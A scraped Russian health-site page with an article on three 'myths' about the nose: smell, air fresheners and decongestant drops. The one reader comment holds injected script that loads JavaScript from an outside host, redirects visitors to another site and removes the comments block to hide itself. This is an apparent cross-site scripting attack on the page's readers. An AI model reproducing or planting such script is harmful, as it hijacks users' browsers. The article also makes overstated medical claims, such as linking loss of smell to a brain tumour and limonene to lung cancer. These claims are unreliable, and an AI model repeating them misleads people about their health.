Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 мифа о носе  >>  3 мифа о носе
 
Обратная связь
 

3 мифа о носе

Размер шрифта
24 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Нос чувствует запахи? Освежитель воздуха убивает вонь? При насморке надо капать капли? Если на все эти вопросы вы ответили «да», значит, вы не видите дальше своего носа. 3 мифа о носе и 3 правильных ответа.

1

Миф №1 «Мы чувствуем запахи носом»

Если нос не чувствует запахи, значит нос заложен, думаем мы. Это не совсем так. Нос – это своего рода рецептор, воспринимающий сигнал и отправляющий его в мозг по обонятельному нерву. В корковой зоне мозга, отвечающей за эмоции, сигнал воспринимается, распознается, возникают ассоциации. В носу находится лишь часть обонятельной системы человека – обонятельный эпителий. Размер этой ткани примерно 2-4 квадратных сантиметра, размером с почтовую марку. А корковая зона – намного больше.  

Давайте посмотрим, как мозг чувствует запахи. С потоком воздуха в нос влетают молекулы летучих химических веществ. Они проходят примерно 7 см и достигают обонятельного эпителия, который состоит из специальных нейронов-хеморецепторов. Они покрыты ресничками, которые нужны для увеличения площади восприятия, и слизью. Молекула прилипает к слизи, и хеморецептор посылает сигнал в мозг. Причем каждый рецептор отвечает за свой запах. Затем сигнал попадает в корковый обонятельный центр, который расположен на нижней поверхности височной и лобной долей коры больших полушарий. И только здесь происходит распознавание.

Потеря обоняния называется аносмия. Это может оказаться опасным для жизни состоянием: опухолью в мозгу.

Что делать?

Если вы перестали чувствовать запахи, немедленно обратитесь к врачу. Он отправит вас на МРТ или на КТ головного мозга. Эти анализы помогут прояснить ситуацию.

Миф №2: «Освежители воздуха уничтожают неприятные запахи»

На самом деле освежители воздуха вовсе не уничтожают неприятные запахи, а просто заменяют их другими, маскируя дурной запах синтетическим ароматизатором. Молекулы вещества, вызывающего неприятный запах, никуда не исчезают, а просто смешиваются с резко пахнущим веществом освежителя.

1

Вдохнув в туалетной комнате неприятный запах, вы распыляете освежитель воздуха с ароматом лимона. Что происходит в эту секунду? Молекулы вони никуда не исчезли – вы просто обманули свой мозг. И попутно вдохнули химические вещества освежителя – лимонин, который может спровоцировать сильную аллергическую реакцию, а в больших концентрациях может вызывать рак легких, бронхит и астму. Никаких лепестков розы в освежителе воздуха «с ароматом розы» не ищите, все освежители сделаны на основе нефтепродуктов.

1

Освежители воздуха не уничтожают запахи, а лишь скрывают их. Сам по себе неприятный запах не вреден для здоровья, а вот химические вещества освежителя – вредны.

Что делать?

  • Откажитесь от использования освежителей воздуха.
  • Чаще проветривайте помещение, в крайнем случае используйте натуральные ароматизаторы – корки цитрусовых – апельсина или мандарина, которые очень сильно пахнут.
  • Чаще убирайте в доме.

«Надо капать капли в нос пока не пройдет насморк»

На самом деле капли в нос не лечат насморк, а лишь на короткое время устраняют симптомы заболевания – затрудненное дыхание и отделение муконазального секрета или соплей. Если нос заложен, дышать трудно из-за большого объема секрета и отека слизистой носа. Больному трудно дышать и он тянется за каплям, которые суживают сосуды и на вемя снимают отек.

После окончания действия лекарства сосуды вновь расширяются, причем сильнее, чем до применения капель. Привыкшие к большой концентрации суживающего вещества кровеносные сосуды носоглотки перестают подчиняться приказам гипоталамической системы. Они остаются расширенными, пока не получат свою дозу лекарства. Другими словами, без капель для носа вы уже не сможете нормально жить.

Кроме того, сужение сосудов может привести к повышению давления, что опасно для больных атеросклерозом.

Что делать?

  • Лучше вообще отказаться от капель, тем более капель старого поколения, например, Нафтизина.
  • Использовать такие капли не дольше трех дней и не чаще, чем указано в инструкции. Лучше вообще отказаться от их использования и промывать нос составами на солевой основе.
  • Для укрепления стенок сосудов ешьте больше богатых биофлаваноидами продуктов: смородину, крыжовник, виноград, чернику, бруснику, клюкву, краснокочанную капусту, свеклу, помидоры, салат, зеленый чай.
  • Обратитесь к врачу за консультацией. Насморк может быть из-за аллергии или из-за бактериальной инфекции. Без врача вы не сможете разобраться.
  • Если насморк у ребенка, без врача не обойтись.



Сюжеты по теме:
Мифы о носе. Каким утверждениям не стоит верить

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.